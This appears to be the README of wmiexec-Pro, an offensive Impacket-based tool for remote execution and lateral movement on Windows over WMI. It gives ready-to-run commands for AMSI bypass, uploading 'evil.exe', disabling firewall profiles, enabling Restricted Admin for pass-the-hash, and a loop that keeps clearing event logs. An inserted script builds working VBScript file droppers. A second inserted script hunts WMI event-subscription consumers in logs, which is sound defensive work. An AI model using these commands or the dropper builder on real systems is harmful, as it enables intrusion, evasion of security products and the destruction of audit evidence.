wmiexec-Pro

New generation of wmiexec.py.

Table of Contents

  1. Info
  2. Features
  3. Getting Started
  4. Usage
  5. Screenshots
  6. How it works?
  7. References

Info

A new generation of wmiexec.py with more features. Every module works over WMI/DCOM: the client binds to the RPC endpoint mapper on port 135 and is then directed to the dynamic RPC port the target allocates for WMI, so no SMB (port 445) session is ever opened. Avoiding SMB is what makes the tool useful for lateral movement against AV products that key on SMB-based execution (Windows Defender, HuoRong, 360).
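The evasion argument above is about the network path (no SMB). On the host, several modules rely on permanent WMI event subscriptions (an __EventFilter bound to an ActiveScriptEventConsumer, see "How it works?"), and those are well logged: Sysmon Event IDs 19/20/21 record filter, consumer and binding creation, and Microsoft-Windows-WMI-Activity/Operational Event ID 5861 records a newly bound permanent consumer. The following is an added example, not part of the project, showing the hunting logic a defender would run over such records. The sample events are constructed to resemble those two sources; the Sysmon Type labels ("Script", "Command Line") are assumed to match how Sysmon renders the consumer class.

```python
"""Hunt for permanent WMI event-subscription consumers, the execution
primitive wmiexec-Pro's upload and command paths rely on.

Added example, not project code. SAMPLE_EVENTS are CONSTRUCTED to mimic
Sysmon Event IDs 19/20/21 and WMI-Activity Event ID 5861; field names
follow the public Sysmon schema, Type labels are an assumption.
"""
import re
from dataclasses import dataclass

SCRIPT_LIKE_TYPES = {"Script", "Command Line"}          # assumed Sysmon labels
SCRIPT_LIKE_CLASSES = ("ActiveScriptEventConsumer", "CommandLineEventConsumer")

SAMPLE_EVENTS = [  # constructed, not real telemetry
    {"source": "Sysmon", "EventID": 19, "EventType": "WmiFilterEvent",
     "Operation": "Created", "User": "CORP\\administrator", "Name": "Update_Filter",
     "EventNamespace": "root\\cimv2",
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 "
              "WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"},
    {"source": "Sysmon", "EventID": 20, "EventType": "WmiConsumerEvent",
     "Operation": "Created", "User": "CORP\\administrator", "Name": "Update_Consumer",
     "Type": "Script", "Destination": "Set xml = CreateObject(\"MSXML2.DOMDocument\") ..."},
    {"source": "Sysmon", "EventID": 21, "EventType": "WmiBindingEvent",
     "Operation": "Created", "User": "CORP\\administrator",
     "Consumer": "ActiveScriptEventConsumer.Name=\"Update_Consumer\"",
     "Filter": "__EventFilter.Name=\"Update_Filter\""},
    {"source": "WMI-Activity", "EventID": 5861, "User": "CORP\\administrator",
     "Message": "Namespace = //./root/subscription; Eventfilter = Update_Filter "
                "(refer to its activate eventid:5859); Consumer = "
                "ActiveScriptEventConsumer=\"Update_Consumer\"; PossibleCause = ..."},
    # benign: the consumer Windows itself registers
    {"source": "Sysmon", "EventID": 20, "EventType": "WmiConsumerEvent",
     "Operation": "Created", "User": "NT AUTHORITY\\SYSTEM",
     "Name": "SCM Event Log Consumer", "Type": "Event Log", "Destination": ""},
]


@dataclass(frozen=True)
class Finding:
    rule: str
    user: str
    detail: str


def _name_in(ref: str) -> str:
    """Pull the Name key out of a WMI object path such as __EventFilter.Name="x"."""
    m = re.search(r'Name="([^"]+)"', ref)
    return m.group(1) if m else ref


def check_event(ev: dict):
    """Single-event rules: script/command consumers created or bound. Returns Finding or None."""
    eid = ev["EventID"]
    if ev["source"] == "Sysmon":
        if eid == 20 and ev.get("Type") in SCRIPT_LIKE_TYPES:
            return Finding("wmi_script_consumer_created", ev["User"],
                           f'{ev["Type"]} consumer {ev["Name"]!r}')
        if eid == 21 and ev.get("Consumer", "").startswith(SCRIPT_LIKE_CLASSES):
            return Finding("wmi_script_consumer_bound", ev["User"],
                           f'{_name_in(ev["Consumer"])} -> {_name_in(ev["Filter"])}')
    elif ev["source"] == "WMI-Activity" and eid == 5861:
        if any(c in ev["Message"] for c in SCRIPT_LIKE_CLASSES):
            return Finding("wmi_activity_5861_script_consumer", ev.get("User", "n/a"),
                           ev["Message"][:80])
    return None


def hunt(events):
    """Run the single-event rules over a batch and keep the hits."""
    return [f for f in map(check_event, events) if f is not None]


def complete_subscriptions(events):
    """Correlate Sysmon 19/20/21 per user: a filter, a consumer and a binding
    joining them is a complete, armed subscription (user, filter, consumer)."""
    filters, consumers, bindings = set(), set(), []
    for ev in events:
        if ev["source"] != "Sysmon" or ev.get("Operation") != "Created":
            continue
        if ev["EventID"] == 19:
            filters.add((ev["User"], ev["Name"]))
        elif ev["EventID"] == 20:
            consumers.add((ev["User"], ev["Name"]))
        elif ev["EventID"] == 21:
            bindings.append((ev["User"], _name_in(ev["Filter"]), _name_in(ev["Consumer"])))
    return [b for b in bindings if (b[0], b[1]) in filters and (b[0], b[2]) in consumers]


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f)
    print(complete_subscriptions(SAMPLE_EVENTS))
```

The per-event rules fire on the consumer alone; the correlation is what separates a complete subscription (filter, consumer and binding from the same principal) from a stray consumer object, and the built-in "SCM Event Log Consumer" shows why the consumer class, not the mere existence of a consumer, is the signal.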

(back to top)

Features

  • Main feature: only port 135 (plus the dynamic RPC port it hands out) is needed; no SMB.
  • New module: AMSI bypass
  • New module: file transfer
  • New module: remotely enable RDP via a WMI class method
  • New module: Windows Firewall abuse
  • New module: event log clearing loop
  • New module: remotely enable WinRM without touching CMD
  • Enhancement: command output is retrieved in a new way (from a WMI class instead of the registry)
  • Enhancement: execute a VBS file

(back to top)

Getting Started

Installation

Only the latest version of Impacket is needed.

  1. Clone the impacket repository
    git clone https://github.com/fortra/impacket
  2. Install impacket
    cd impacket && sudo pip3 install .
  3. Clone wmiexec-Pro and enjoy it :)
    git clone https://github.com/XiaoliChan/wmiexec-Pro

(back to top)

Usage

python3 wmiexec-pro.py [[domain/]username[:password]@]<targetName or address> module -h

The examples below use administrator:<password>@<target>; substitute real credentials and the target name or address.

Enable/disable AMSI bypass:
   python3 wmiexec-pro.py administrator:<password>@<target> amsi -enable
   python3 wmiexec-pro.py administrator:<password>@<target> amsi -disable

Execute command:
   python3 wmiexec-pro.py administrator:<password>@<target> exec-command -command "whoami" (silent, no output retrieved)
   python3 wmiexec-pro.py administrator:<password>@<target> exec-command -command "whoami" -with-output (with output)
   python3 wmiexec-pro.py administrator:<password>@<target> exec-command -command "whoami" -with-output -save (with output, saved to a file)
   
File transfer:
   python3 wmiexec-pro.py administrator:<password>@<target> filetransfer -upload -src-file "./evil.exe" -dest-file "C:\windows\temp\evil.exe" (upload; files larger than 512KB are supported)
   python3 wmiexec-pro.py administrator:<password>@<target> filetransfer -download -src-file "C:\windows\temp\evil.exe" -dest-file "/tmp/evil.exe" (download; files larger than 512KB are supported)
   
RDP:
   python3 wmiexec-pro.py administrator:<password>@<target> rdp -enable (firewall is configured automatically)
   python3 wmiexec-pro.py administrator:<password>@<target> rdp -enable-ram (enable Restricted Admin Mode for pass-the-hash)
   python3 wmiexec-pro.py administrator:<password>@<target> rdp -disable
   python3 wmiexec-pro.py administrator:<password>@<target> rdp -disable-ram (disable Restricted Admin Mode)

WinRM:
   python3 wmiexec-pro.py administrator:<password>@<target> winrm -enable
   python3 wmiexec-pro.py administrator:<password>@<target> winrm -disable

Firewall:
   python3 wmiexec-pro.py administrator:<password>@<target> firewall -search-port 445 (list rules for a port)
   python3 wmiexec-pro.py administrator:<password>@<target> firewall -dump (dump all firewall rules)
   python3 wmiexec-pro.py administrator:<password>@<target> firewall -rule-id (ID from -search-port) -rule-op [enable/disable/remove] (enable, disable or remove the specified rule)
   python3 wmiexec-pro.py administrator:<password>@<target> firewall -firewall-profile enable (enable all firewall profiles)
   python3 wmiexec-pro.py administrator:<password>@<target> firewall -firewall-profile disable (disable all firewall profiles)
   
Eventlog:
   python3 wmiexec-pro.py administrator:<password>@<target> eventlog -risk-i-know (start the event log clearing loop)
   python3 wmiexec-pro.py administrator:<password>@<target> eventlog -retrive object-ID (stop the clearing loop identified by object-ID)
   

(back to top)

Screenshots

  • Help

  • exec-command

  • filetransfer

    • upload file

    • download file

(back to top)

How it works?

  • AMSI module:

    • Tal Liberman's technique from Black Hat Asia 2018.
  • exec-command module:

    • Enhancement of the earlier project wmiexec-RegOut: output is read from a WMI class instead of from the registry.
  • filetransfer module:

    • For upload: the source file is base64-encoded into the dropper WriteFile.vbs, then a new ActiveScriptEventConsumer instance is created to execute the dropper on the target.
    • For download: a class is created remotely to hold the data, then the encoder LocalFileIntoClass.vbs is executed to encode the file and store the data in that class.
  • rdp module:

    • Enable/disable RDP services: the TerminalServices object is controlled directly.
    • Enable/disable Restricted Admin Mode: the DisableRestrictedAdmin registry value is set via the StdRegProv class.
  • winrm module:

    • Enable/disable: the StartService()/StopService() methods of Win32_Service are called.
    • Firewall rules: the firewall.py module configures the firewall for WinRM.
  • firewall module:

    • Abuses the MSFT_NetProtocolPortFilter, MSFT_NetFirewallRule and MSFT_NetFirewallProfile classes.
  • eventlog module:

    • Executes the script ClearEventlog.vbs without removing the event filter and consumer, so it keeps running.
  • execute-vbs module:

    • Taken from wmipersist.py.
  • classMethodEx method:

    • Create class: executes the script CreateClass.vbs to create a simple class. (Why a script? The author did not find a way to use the PutClass method in Impacket.)
    • Remove class: calls the DeleteClass method to remove the class.
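The upload path described above (base64 payload embedded in a VBScript dropper that an ActiveScriptEventConsumer executes) is easy to reproduce and check locally. The following is an added example, not wmiexec-Pro's own WriteFile.vbs: it generates such a dropper and, for the responder holding a captured ScriptText, extracts the payload and destination path back out, so the round trip can be verified without a target. The chunk size, variable names and helper names are this example's choices. The VBScript uses the standard MSXML2.DOMDocument bin.base64 decode and ADODB.Stream binary write.

```python
"""Build and parse a base64-in-VBScript file dropper.

Added example, not project code. CHUNK, the variable names and the
helper names are arbitrary choices; the VBScript body uses the stock
MSXML2.DOMDocument (DataType = "bin.base64") decode and ADODB.Stream
(Type = 1, SaveToFile mode 2) binary write.
"""
import base64
import re

CHUNK = 1024  # base64 characters per concatenation line (arbitrary)


def build_dropper(payload: bytes, dest_path: str) -> str:
    """Return VBScript text that recreates `payload` at `dest_path` when run."""
    b64 = base64.b64encode(payload).decode("ascii")
    lines = ["Dim b64", 'b64 = ""']
    # split the literal so no single VBScript line becomes unwieldy
    for i in range(0, len(b64), CHUNK):
        lines.append(f'b64 = b64 & "{b64[i:i + CHUNK]}"')
    vbs_path = dest_path.replace('"', '""')  # VBScript escapes a quote by doubling it
    lines += [
        'Set xml = CreateObject("MSXML2.DOMDocument")',
        'Set node = xml.createElement("b64")',
        'node.DataType = "bin.base64"',
        "node.Text = b64",
        'Set stm = CreateObject("ADODB.Stream")',
        "stm.Type = 1",                      # adTypeBinary
        "stm.Open",
        "stm.Write node.nodeTypedValue",     # nodeTypedValue is the decoded byte array
        f'stm.SaveToFile "{vbs_path}", 2',   # adSaveCreateOverWrite
        "stm.Close",
    ]
    return "\r\n".join(lines) + "\r\n"


def extract_payload(script: str) -> bytes:
    """Inverse of build_dropper: rebuild the base64 from the concatenation
    lines of a captured script and decode it."""
    chunks = re.findall(r'^b64 = b64 & "([A-Za-z0-9+/=]*)"\r?$', script, re.M)
    return base64.b64decode("".join(chunks))


def extract_dest_path(script: str) -> str:
    """Recover where the dropper would write, undoing the doubled quotes."""
    m = re.search(r'^stm\.SaveToFile "((?:[^"]|"")*)", 2\r?$', script, re.M)
    return m.group(1).replace('""', '"') if m else ""


if __name__ == "__main__":
    sample = bytes(range(256)) * 12  # constructed 3072-byte "file"
    vbs = build_dropper(sample, r"C:\Windows\Temp\sample.bin")
    assert extract_payload(vbs) == sample
    print(vbs.splitlines()[0:2], "...", vbs.splitlines()[-3:])
```

On the wire the generated text is what ends up in the ScriptText property of the consumer; in Impacket's wmipersist.py that instance is built by spawning an ActiveScriptEventConsumer object, setting Name, ScriptingEngine ("VBScript") and ScriptText, and committing it with PutInstance, which is also why a defender who sees such a consumer can pull the whole payload straight out of the event record rather than off disk.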

(back to top)

References

(back to top)
